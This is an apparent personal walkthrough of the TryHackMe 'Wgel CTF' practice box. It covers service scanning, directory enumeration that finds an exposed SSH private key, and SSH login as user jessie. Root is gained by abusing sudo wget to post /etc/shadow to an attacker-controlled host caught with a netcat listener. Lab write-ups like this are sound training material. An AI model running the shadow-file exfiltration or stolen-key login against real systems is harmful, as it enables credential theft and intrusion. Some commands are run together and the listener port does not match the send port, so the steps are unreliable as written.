Challenges: wgelctf (TryHackMe)

Wgel CTF
Start Machine
Have fun with this easy box.
Answer the questions below
User flag
nmap -sC -sV IP_Address
on the source code of http://IP_ADDRESS there’s comment with name
jessie
just look around the site and enumerating we find the
/sitemap/path that has this interesting.sshfolder and several paths that didn’t have much helpful infogobuster dir -u http://IP_Address/sitemap/ -w /usr/share/wordlists/dirb/common.txt


we copied the id_rsa into a file and set permissions. Then used id_rsa to low access, jessie, for the user flag
ssh -i id_rsa jessie@<TARGET_IP>
lsls -la /Documentscat /Documents/user_flag.txt
Root flag
after running
sudo -lmy first thought was to check sudo under wget on GTFOBINS but it was a bit complicated later on learned of a different way through this article and GPT.
sudo wget —post-file=/etc/shadow http://ATT_IP:443
nc -lvnp 8000lscat root_flag.txt




